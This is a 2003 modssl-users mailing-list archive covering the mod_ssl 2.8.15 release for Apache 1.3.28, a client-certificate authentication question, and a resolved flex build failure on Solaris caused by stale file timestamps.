Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 18 19:20:33 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D1F3FA8967; Fri, 18 Jul 2003 19:20:33 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from visp.engelschall.com (unknown [195.27.176.156])
	by master.modssl.org (Postfix) with ESMTP
	id 1A148A8933; Fri, 18 Jul 2003 19:20:33 +0200 (CEST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id EE6944CE575; Fri, 18 Jul 2003 19:20:32 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 92FF7287EB; Fri, 18 Jul 2003 19:20:15 +0200 (CEST)
Date: Fri, 18 Jul 2003 19:20:15 +0200
From: "Ralf S. Engelschall" 
To: modssl-announce@modssl.org, modssl-users@modssl.org
Subject: [ANNOUNCE] mod_ssl 2.8.15 for Apache 1.3.28
Message-ID: <20030718172015.GA42676@engelschall.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.4.1i
Organization: Engelschall, Germany.
X-Web-Homepage: http://www.engelschall.com/
X-PGP-Public-Key: http://www.engelschall.com/ho/rse/pgprse.asc
X-PGP-Fingerprint: 00 C9 21 8E D1 AB 70 37 DD 67 A2 3A 0A 6F 8D A5
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ralf S. Engelschall" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

As you've certainly recognized, Apache 1.3.28 was released. I've
prepared the companion mod_ssl 2.8.15 which cleanly (without any
conflicts) patches into its source tree.

As usual, you can find it under:

http://www.modssl.org/source/
 ftp://ftp.modssl.org/source/

Yours,
                                       Ralf S. Engelschall
                                       rse@engelschall.com
                                       www.engelschall.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 18 19:33:56 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 10BE1A8945; Fri, 18 Jul 2003 19:33:56 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from poison.mail.pas.earthlink.net (poison.mail.pas.earthlink.net [207.217.120.106])
	by master.modssl.org (Postfix) with ESMTP id C4F0AA8933
	for ; Fri, 18 Jul 2003 19:33:54 +0200 (CEST)
Received: from delik.eng.atl.earthlink.net ([199.174.116.78] helo=DELIK)
	by poison.mail.pas.earthlink.net with smtp (Exim 3.33 #1)
	id 19dZ79-0001gI-00
	for modssl-users@modssl.org; Fri, 18 Jul 2003 10:33:51 -0700
Message-ID: <001701c34d52$36b73820$4e74aec7@DELIK>
From: "Ihor Bilyy" 
To: 
References: <20030718172015.GA42676@engelschall.com>
Subject: Re: [ANNOUNCE] mod_ssl 2.8.15 for Apache 1.3.28
Date: Fri, 18 Jul 2003 13:29:59 -0400
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2720.3000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2727.1300
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ihor Bilyy" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

fix the link

----- Original Message ----- 
From: "Ralf S. Engelschall" 
To: ; 
Sent: Friday, July 18, 2003 1:20 PM
Subject: [ANNOUNCE] mod_ssl 2.8.15 for Apache 1.3.28


> As you've certainly recognized, Apache 1.3.28 was released. I've
> prepared the companion mod_ssl 2.8.15 which cleanly (without any
> conflicts) patches into its source tree.
> 
> As usual, you can find it under:
> 
> http://www.modssl.org/source/
>  ftp://ftp.modssl.org/source/
> 
> Yours,
>                                        Ralf S. Engelschall
>                                        rse@engelschall.com
>                                        www.engelschall.com
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 18 19:39:42 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D1680A8945; Fri, 18 Jul 2003 19:39:42 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from spock.ste-land.com (spock.ste-land.com [64.32.179.40])
	by master.modssl.org (Postfix) with ESMTP id 96DB2A8933
	for ; Fri, 18 Jul 2003 19:39:39 +0200 (CEST)
Received: from ste-land.com (bgp377940bgs.plnfld01.nj.comcast.net [68.36.5.198])
	by spock.ste-land.com (Postfix) with ESMTP id BCB4A2D252
	for ; Fri, 18 Jul 2003 13:39:36 -0400 (EDT)
Message-ID: <3F1830D6.3080205@ste-land.com>
Date: Fri, 18 Jul 2003 13:39:34 -0400
From: "Shaun T. Erickson" 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.4b) Gecko/20030507
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: [ANNOUNCE] mod_ssl 2.8.15 for Apache 1.3.28
References: <20030718172015.GA42676@engelschall.com> <001701c34d52$36b73820$4e74aec7@DELIK>
In-Reply-To: <001701c34d52$36b73820$4e74aec7@DELIK>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Shaun T. Erickson" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Ihor Bilyy wrote:

> fix the link

Where are your manners? Say please next time.

	-ste


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 18 21:47:35 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id C6F47A8945; Fri, 18 Jul 2003 21:47:35 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from imbaspam-ny03.ssmb.com (mail1.ssmb.COM [199.67.139.25])
	by master.modssl.org (Postfix) with ESMTP id A1DB2A8933
	for ; Fri, 18 Jul 2003 21:47:33 +0200 (CEST)
Received: from imbarc-ny02.ny.ssmb.com (imbarc-ny02-1 [162.124.186.139])
	by imbaspam-ny03.ssmb.com (8.12.10.Beta2/8.12.10.Beta2/SSMB_EXT/evision: 1.20 $) with ESMTP id h6IJlUWe020746
	for ; Fri, 18 Jul 2003 15:47:30 -0400 (EDT)
Received: from mailhub-nyc2.ny.ssmb.com (mailhub-nyc2-hme0.ny.ssmb.com [162.124.148.16])
	by imbarc-ny02.ny.ssmb.com (8.12.9/8.12.9/SSMB_QQQ_IN/1.1) with ESMTP id h6IJlJIe021206
	for ; Fri, 18 Jul 2003 15:47:20 -0400 (EDT)
Received: from exnjims01.nj.ssmb.com (EXNJIMS01.nj.ssmb.com [150.110.235.50])
	by mailhub-nyc2.ny.ssmb.com (8.9.3-GEMSp2/8.9.3/SSMB-HUB) with ESMTP id PAA14485
	for ; Fri, 18 Jul 2003 15:47:19 -0400 (EDT)
Received: by EXNJIMS01.nj.ssmb.com with Internet Mail Service (5.5.2655.55)
	id ; Fri, 18 Jul 2003 15:47:19 -0400
Message-ID: <9F1AE1497901D71185A20002A56B9B2601B0FDB8@exchny43.ny.ssmb.com>
From: "Nauman, Ahmed [IT]" 
To: "'modssl-users@modssl.org'" 
Subject: Handshake Issue ? 
Date: Fri, 18 Jul 2003 15:47:16 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2655.55)
Content-Type: text/plain
X-Scanned-By: MIMEDefang 2.35
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Nauman, Ahmed [IT]" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi all,

i am Using Apache/1.3.27 Server with mod ssl. I have following question and
i will highly appreciate if someone of you can spare some time for the
answers.

1- I have specified a SSLCACertificateFile directive and have also required
for client authentication. When i try to access that directory through
Internet Explorer, it does not ask me which client certificate to select but
displays a message that i am accessing private item, then asks for user name
and password and then shows Server Certificate Message - if i select YES
then it displays the contents. As it is displaying the contents i am
assuming that everything went fine. BUT why i am not getting selection of
client certificates - i have three different certs installed for client.

2- How can i mention more than 1 CAs as trusted CAs in httpd.conf file ?

The log shows following
[18/Jul/2003 15:43:16 22122] [info]  Connection to child 0 established
(server cddfs1.nj.ssmb.com:8443, client 168.109.64.190)
[18/Jul/2003 15:43:16 22123] [info]  Seeding PRNG with 1160 bytes of entropy
[18/Jul/2003 15:43:16 22122] [info]  Seeding PRNG with 1160 bytes of entropy
[18/Jul/2003 15:43:16 22122] [info]  Connection: Client IP: 168.109.64.190,
Protocol: SSLv3, Cipher: RC4-MD5 (128/128 bits)
[18/Jul/2003 15:43:16 22122] [info]  Initial (No.1) HTTPS request received
for child 0 (server cddfs1.nj.ssmb.com:8443)
[18/Jul/2003 15:43:16 22122] [info]  Connection to child 0 closed with
unclean shutdown (server cddfs1.nj.ssmb.com:8443, client 168.109.64.190)
[18/Jul/2003 15:43:16 22123] [info]  Connection: Client IP: 168.109.64.190,
Protocol: SSLv3, Cipher: RC4-MD5 (128/128 bits)
[18/Jul/2003 15:43:16 22123] [info]  Initial (No.1) HTTPS request received
for child 1 (server cddfs1.nj.ssmb.com:8443)
[18/Jul/2003 15:43:16 22123] [info]  Connection to child 1 closed with
unclean shutdown (server cddfs1.nj.ssmb.com:8443, client 168.109.64.190)

i don't see any SSL handshake or verification for this transaction ? Any
help will be highly appreciated.

Regards,
Nauman


-----Original Message-----
From: Shaun T. Erickson [mailto:ste@ste-land.com]
Sent: Friday, July 18, 2003 1:40 PM
To: modssl-users@modssl.org
Subject: Re: [ANNOUNCE] mod_ssl 2.8.15 for Apache 1.3.28


Ihor Bilyy wrote:

> fix the link

Where are your manners? Say please next time.

	-ste


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 21 14:23:27 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id BEA48A8947; Mon, 21 Jul 2003 14:23:27 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ns0b.swx.com (ns0b.swx.com [146.109.240.235])
	by master.modssl.org (Postfix) with ESMTP id 6F0FCA8934
	for ; Mon, 21 Jul 2003 14:23:26 +0200 (CEST)
Received: from gate0a.unix.swx.ch (gate0a [192.168.252.17])
	by ns0b.swx.com (8.12.9/8.12.9) with ESMTP id h6LCNNAY021169
	for ; Mon, 21 Jul 2003 14:23:23 +0200 (MEST)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0a.unix.swx.ch (8.12.9/8.12.9) with ESMTP id h6LCNMtF026596
	for ; Mon, 21 Jul 2003 14:23:22 +0200 (MEST)
Content-Class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Subject: Flex failure during apache 1.3.28 make
Date: Mon, 21 Jul 2003 14:23:22 +0200
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Flex failure during apache 1.3.28 make
Importance: normal
thread-index: AcNPguAs9cgKgexQQFym+xaRESfa2Q==
From: "Boyle Owen" 
To: "mod_ssl list (E-mail)" 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Greetings,=20

I'm trying to compile the new 2.8.15 with apache 1.3.28 but hit a
problem when make tries to run "flex" on the file
src/modules/ssl/ssl_expr_scan.l.

I'm running Solaris 8 on a Sparc and flex is version 2.4.7.

Up until now, I've always regarded flex as one of those mysterious
little utilities that developers like to use and I've avoided learning
anything at all about it. Why has it suddenly decided to show me how
important it is?

Rgds,
Owen Boyle
Disclaimer: Any disclaimer attached to this message may be ignored.=20

PS Here is the error trace:

/tmp/apache_1.3.28 > make
...snip...
=3D=3D=3D> src/modules/ssl
flex -Pssl_expr_yy -s -B ssl_expr_scan.l
"ssl_expr_scan.l", line 89: bad character: %
"ssl_expr_scan.l", line 90: unknown error processing section 1
"ssl_expr_scan.l", line 90: bad character: %
"ssl_expr_scan.l", line 91: unknown error processing section 1
*** Error code 1
make: Fatal error: Command failed for target `ssl_expr_scan.c'
Current working directory /tmp/apache_1.3.28/src/modules/ssl
*** Error code 1
make: Fatal error: Command failed for target `all'
Current working directory /tmp/apache_1.3.28/src/modules
*** Error code 1
make: Fatal error: Command failed for target `subdirs'
Current working directory /tmp/apache_1.3.28/src
*** Error code 1
make: Fatal error: Command failed for target `build-std'
Current working directory /tmp/apache_1.3.28
*** Error code 1
make: Fatal error: Command failed for target `build'

Diese E-mail ist eine private und pers=F6nliche Kommunikation. Sie hat
keinen Bezug zur B=F6rsen- bzw. Gesch=E4ftst=E4tigkeit der SWX Swiss =
Exchange.
This e-mail is of a private and personal nature. It is not related to
the exchange or business activities of the SWX Swiss Exchange. Le
pr=E9sent e-mail est un message priv=E9 et personnel, sans rapport avec
l'activit=E9 boursi=E8re de la SWX Swiss Exchange.

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company.=20


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 21 14:43:14 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id F1F36A8947; Mon, 21 Jul 2003 14:43:13 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from toftum.dk (toftum.dk [193.88.12.46])
	by master.modssl.org (Postfix) with ESMTP id DB677A8934
	for ; Mon, 21 Jul 2003 14:43:12 +0200 (CEST)
Received: by toftum.dk (Postfix, from userid 1001)
	id 276D16E40E7; Mon, 21 Jul 2003 14:43:06 +0200 (CEST)
Date: Mon, 21 Jul 2003 14:43:06 +0200
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: Flex failure during apache 1.3.28 make
Message-ID: <20030721124305.GB14671@toftum.dk>
Mail-Followup-To: modssl-users@modssl.org
References: 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Mon, Jul 21, 2003 at 02:23:22PM +0200, Boyle Owen wrote:
> Greetings, 
> 
> I'm trying to compile the new 2.8.15 with apache 1.3.28 but hit a
> problem when make tries to run "flex" on the file
> src/modules/ssl/ssl_expr_scan.l.
> 
This shouldn't happen unless timestamps were messed up.  Try touching
src/modules/ssl/ssl_expr_scan.c to make sure its timestamp is newer than
the .l file.

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 21 14:48:21 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 9AB59A8934; Mon, 21 Jul 2003 14:48:21 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.blue.net (mail.blue.net [66.38.0.201])
	by master.modssl.org (Postfix) with ESMTP id BBE65A893F
	for ; Mon, 21 Jul 2003 14:48:19 +0200 (CEST)
Received: from blue.net (darin.bginc.net [66.38.3.13])
	by bn0.blue.net (8.12.9/8.12.9/MX) with ESMTP id h6LCmCNH012999
	for ; Mon, 21 Jul 2003 07:48:16 -0500 (CDT)
Message-ID: <3F1BE10C.2050908@blue.net>
Date: Mon, 21 Jul 2003 08:48:12 -0400
From: Darin Holloway 
Organization: Bluegrass Netowrk, LLC
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.4) Gecko/20030624
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Flex failure during apache 1.3.28 make
References: 
In-Reply-To: 
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Darin Holloway 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I've found that the Sun versions of certain utilities (sed in my case, tar for 
lots of people) have problems with code that works fine with GNU utilities, my 
advice would be to install the gnu version of most utilities in /usr/local/bin 
or in /opt/bin and either use them as the first in your path (my 
recommendation) or just switch to the non-sun tools when needed.  Check out 
sunfreeware.com for the packages. flex is at version 2.5.4a on sunfreeware


Boyle Owen wrote:
> Greetings, 
> 
> I'm trying to compile the new 2.8.15 with apache 1.3.28 but hit a
> problem when make tries to run "flex" on the file
> src/modules/ssl/ssl_expr_scan.l.
> 
> I'm running Solaris 8 on a Sparc and flex is version 2.4.7.
> 
> Up until now, I've always regarded flex as one of those mysterious
> little utilities that developers like to use and I've avoided learning
> anything at all about it. Why has it suddenly decided to show me how
> important it is?
> 
> Rgds,
> Owen Boyle
> Disclaimer: Any disclaimer attached to this message may be ignored. 
> 
> PS Here is the error trace:
> 
> /tmp/apache_1.3.28 > make
> ...snip...
> ===> src/modules/ssl
> flex -Pssl_expr_yy -s -B ssl_expr_scan.l
> "ssl_expr_scan.l", line 89: bad character: %
> "ssl_expr_scan.l", line 90: unknown error processing section 1
> "ssl_expr_scan.l", line 90: bad character: %
> "ssl_expr_scan.l", line 91: unknown error processing section 1
> *** Error code 1
> make: Fatal error: Command failed for target `ssl_expr_scan.c'
> Current working directory /tmp/apache_1.3.28/src/modules/ssl
> *** Error code 1
> make: Fatal error: Command failed for target `all'
> Current working directory /tmp/apache_1.3.28/src/modules
> *** Error code 1
> make: Fatal error: Command failed for target `subdirs'
> Current working directory /tmp/apache_1.3.28/src
> *** Error code 1
> make: Fatal error: Command failed for target `build-std'
> Current working directory /tmp/apache_1.3.28
> *** Error code 1
> make: Fatal error: Command failed for target `build'
> 
> Diese E-mail ist eine private und persönliche Kommunikation. Sie hat
> keinen Bezug zur Börsen- bzw. Geschäftstätigkeit der SWX Swiss Exchange.
> This e-mail is of a private and personal nature. It is not related to
> the exchange or business activities of the SWX Swiss Exchange. Le
> présent e-mail est un message privé et personnel, sans rapport avec
> l'activité boursière de la SWX Swiss Exchange.
> 
> This message is for the named person's use only. It may contain
> confidential, proprietary or legally privileged information. No
> confidentiality or privilege is waived or lost by any mistransmission.
> If you receive this message in error, please notify the sender urgently
> and then immediately delete the message and any copies of it from your
> system. Please also immediately destroy any hardcopies of the message.
> You must not, directly or indirectly, use, disclose, distribute, print,
> or copy any part of this message if you are not the intended recipient.
> The sender's company reserves the right to monitor all e-mail
> communications through their networks. Any views expressed in this
> message are those of the individual sender, except where the message
> states otherwise and the sender is authorised to state them to be the
> views of the sender's company. 
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
> 
> 

-- 
Darin Holloway
Systems Administrator and Web Developer
Bluegrass Network, LLC


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 21 15:46:12 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 5F5AFA8947; Mon, 21 Jul 2003 15:46:12 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from darkstar.sysinfo.com (darkstar.sysinfo.com [209.170.144.33])
	by master.modssl.org (Postfix) with ESMTP id E8F7DA8934
	for ; Mon, 21 Jul 2003 15:46:06 +0200 (CEST)
Received: from blackhole.sysinfo.com (dufresne@blackhole.sysinfo.com [209.170.142.145])
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id JAA16475;
	Mon, 21 Jul 2003 09:45:00 -0400
Date: Mon, 21 Jul 2003 09:44:58 -0400 (EDT)
From: "R. DuFresne" 
To: Mads Toftum 
Cc: modssl-users@modssl.org
Subject: Re: Flex failure during apache 1.3.28 make
In-Reply-To: <20030721124305.GB14671@toftum.dk>
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


wasn't this an issue with a modssl version a year or two ago?  something
like the source files in the tarball not having the proper date stamps and
as Mad's mentiones, required a touch of a few files to make flex more
'flexable'?

Thanks,

Ron DuFresne

On Mon, 21 Jul 2003, Mads Toftum wrote:

> On Mon, Jul 21, 2003 at 02:23:22PM +0200, Boyle Owen wrote:
> > Greetings, 
> > 
> > I'm trying to compile the new 2.8.15 with apache 1.3.28 but hit a
> > problem when make tries to run "flex" on the file
> > src/modules/ssl/ssl_expr_scan.l.
> > 
> This shouldn't happen unless timestamps were messed up.  Try touching
> src/modules/ssl/ssl_expr_scan.c to make sure its timestamp is newer than
> the .l file.
> 
> vh
> 
> Mads Toftum
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 21 16:37:58 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id AF242A8947; Mon, 21 Jul 2003 16:37:58 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from park.rambler.ru (park.rambler.ru [81.19.64.101])
	by master.modssl.org (Postfix) with ESMTP id 109CFA8934
	for ; Mon, 21 Jul 2003 16:37:57 +0200 (CEST)
Received: from is.park.rambler.ru (is.park.rambler.ru [81.19.64.102])
	by park.rambler.ru (8.12.6/8.12.6) with ESMTP id h6LEbnmF015690
	for ; Mon, 21 Jul 2003 18:37:49 +0400 (MSD)
Date: Mon, 21 Jul 2003 18:37:49 +0400 (MSD)
From: Igor Sysoev 
X-Sender: is@is
To: modssl-users@modssl.org
Subject: Re: [ANNOUNCE] mod_ssl 2.8.15 for Apache 1.3.28
In-Reply-To: <20030718172015.GA42676@engelschall.com>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Igor Sysoev 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Fri, 18 Jul 2003, Ralf S. Engelschall wrote:

> As you've certainly recognized, Apache 1.3.28 was released. I've
> prepared the companion mod_ssl 2.8.15 which cleanly (without any
> conflicts) patches into its source tree.

2.8.15 does not fix EAPI shared pool bug introduced in 2.8.13 and described
here: http://marc.theaimsgroup.com/?l=apache-modssl&m=105181392031750


Igor Sysoev
http://sysoev.ru/en/

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 21 17:15:02 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E2172A8947; Mon, 21 Jul 2003 17:15:01 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ns0a.swx.com (ns0a.swx.com [146.109.240.107])
	by master.modssl.org (Postfix) with ESMTP id C7E74A8934
	for ; Mon, 21 Jul 2003 17:14:59 +0200 (CEST)
Received: from gate0b.unix.swx.ch (gate0b [192.168.252.145])
	by ns0a.swx.com (8.12.9/8.12.9) with ESMTP id h6LFEtYd023785
	for ; Mon, 21 Jul 2003 17:14:57 +0200 (MEST)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0b.unix.swx.ch (8.12.9/8.12.9) with ESMTP id h6LFErGU023820
	for ; Mon, 21 Jul 2003 17:14:54 +0200 (MEST)
Content-Class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Subject: RE: Flex failure during apache 1.3.28 make - RESOLVED
Date: Mon, 21 Jul 2003 17:14:53 +0200
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Flex failure during apache 1.3.28 make
Importance: normal
thread-index: AcNPjo58WkMBH4V/QiGiziR4JkD9hQAAmyEA
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Thanks all!

Touching the .c files in src/modules/ssl let flex do its work and the
make continued without a hitch.

I repeated the build with a cleanly untarred distribution and it
compiled smoothly. Looking back, my original attempt failed because I
set the wrong path for EAPI_MM (I upgraded ocsp-mm at the same time). I
did a "make clean" before relaunching make but that probably doesn't
reset time stamps and so that explains why they got mixed up. So the
lesson learned is: If make fails, ditch the distro and unpack again...

Rgds,
Owen Boyle
Disclaimer: Any disclaimer attached to this message may be ignored.=20


>-----Original Message-----
>From: R. DuFresne [mailto:dufresne@sysinfo.com]
>Sent: Montag, 21. Juli 2003 15:45
>To: Mads Toftum
>Cc: modssl-users@modssl.org
>Subject: Re: Flex failure during apache 1.3.28 make
>
>
>
>wasn't this an issue with a modssl version a year or two ago? =20
>something
>like the source files in the tarball not having the proper=20
>date stamps and
>as Mad's mentiones, required a touch of a few files to make flex more
>'flexable'?
>
>Thanks,
>
>Ron DuFresne
>
>On Mon, 21 Jul 2003, Mads Toftum wrote:
>
>> On Mon, Jul 21, 2003 at 02:23:22PM +0200, Boyle Owen wrote:
>> > Greetings,=20
>> >=20
>> > I'm trying to compile the new 2.8.15 with apache 1.3.28 but hit a
>> > problem when make tries to run "flex" on the file
>> > src/modules/ssl/ssl_expr_scan.l.
>> >=20
>> This shouldn't happen unless timestamps were messed up.  Try touching
>> src/modules/ssl/ssl_expr_scan.c to make sure its timestamp=20
>is newer than
>> the .l file.
>>=20
>> vh
>>=20
>> Mads Toftum
>>=20
>
>--=20
>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>        admin & senior security consultant:  sysinfo.com
>                        http://sysinfo.com
>
>"Cutting the space budget really restores my faith in humanity.  It
>eliminates dreams, goals, and ideals and lets us get straight to the
>business of hate, debauchery, and self-annihilation."
>                -- Johnny Hart
>
>testing, only testing, and damn good at it too!
>
>______________________________________________________________________
